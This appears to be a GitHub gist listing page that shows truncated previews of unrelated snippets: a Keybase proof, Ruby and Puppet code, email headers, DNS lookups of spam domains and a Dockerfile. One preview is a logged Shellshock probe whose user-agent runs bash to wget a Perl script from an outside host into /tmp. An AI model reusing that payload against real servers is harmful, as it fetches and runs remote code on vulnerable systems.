This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am ripienaar on github. | |
* I am ripienaar (https://keybase.io/ripienaar) on keybase. | |
* I have a public key whose fingerprint is 132C 3894 D8D3 48ED B2B9 E9FF 02E5 780D F1BC 6F01 | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* The dance is complete and the flash bits have been lit. Toss | |
* the packet over the fence for processing, which may light up | |
* more flashers. | |
*/ | |
/* | |
* Initially, we populate the island with all the rifraff peers | |
* that happen to be lying around. Those with seriously |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"time":"26/Sep/2014:05:35:36 +0100", "referer":"-", "method":"GET", "protocol":"HTTP/1.1", "url":"/cgi-sys/defaultwebpage.cgi", "remoteip":"91.200.84.22", "remotehost":"91.200.84.22", "status":"301", "useragent":"() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=x.com -O /tmp/a.pl\""} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'rubygems' | |
require 'xmlsimple' | |
require 'yaml' | |
require 'pp' | |
hash = XmlSimple.xml_in('togo.xml') | |
points = {} | |
hash["point"].each do |p| |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ irb -r yaml | |
>> puts ([{},{}]).to_yaml | |
--- | |
- {} | |
- {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Return-Path: [email protected] | |
Received: from zimbra1.devco.net (LHLO zimbra1.devco.net) (80.85.85.122) by | |
zimbra1.devco.net with LMTP; Fri, 13 Feb 2015 19:15:26 +0000 (GMT) | |
Received: from zimbra1.devco.net (localhost [127.0.0.1]) | |
by zimbra1.devco.net (Postfix) with ESMTPS id 056B168054 | |
for <[email protected]>; Fri, 13 Feb 2015 19:15:26 +0000 (GMT) | |
Received: from zimbra1.devco.net (localhost [127.0.0.1]) | |
by zimbra1.devco.net (Postfix) with ESMTPS id ED07368055 | |
for <[email protected]>; Fri, 13 Feb 2015 19:15:25 +0000 (GMT) | |
Received: from mw1.devco.net (mw1.devco.net [178.79.157.154]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
actnow.doubthealthproblem.org has address 162.255.119.254 | |
availnow.mosttrackingsystem.us has address 162.255.119.254 | |
cancelnow.nationalpublicissue.work has address 162.255.119.254 | |
check.coreslimtummy.org has address 162.255.119.254 | |
choose.beautydietlocal.work has address 162.255.119.254 | |
choose.naturalhealthcareplan.org has address 162.255.119.254 | |
decline.beautydietlocal.work has address 162.255.119.254 | |
decline.naturalhealthcareplan.org has address 162.255.119.254 | |
decline.toequalrefinancecost.org has address 162.255.119.254 | |
disallow.bellyfatslower.us has address 162.255.119.254 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM centos:7 | |
MAINTAINER R.I.Pienaar "[email protected]" | |
WORKDIR /opt/gogs | |
RUN yum install -y git openssh-server unzip initscripts rsync; yum clean all | |
RUN yum -y update; yum clean all | |
RUN useradd --shell /bin/bash --system --comment gogits git |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
% docker run -ti --rm ripienaar/rbldnsd --inspect | |
Container management methods: | |
Container supports START method using command /srv/support/bin/start.sh | |
Container supports UPDATE method using command /srv/support/bin/update.sh | |
Container supports VALIDATE method using command /srv/support/bin/validate.sh | |
Metadata for image centos_base | |
Names: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class one { | |
$x = 1 | |
two{"x": } | |
} | |
define two { | |
notice("notice: '${x}'") | |
notice(inline_template("inline template: '<%= @x %>'")) | |
} |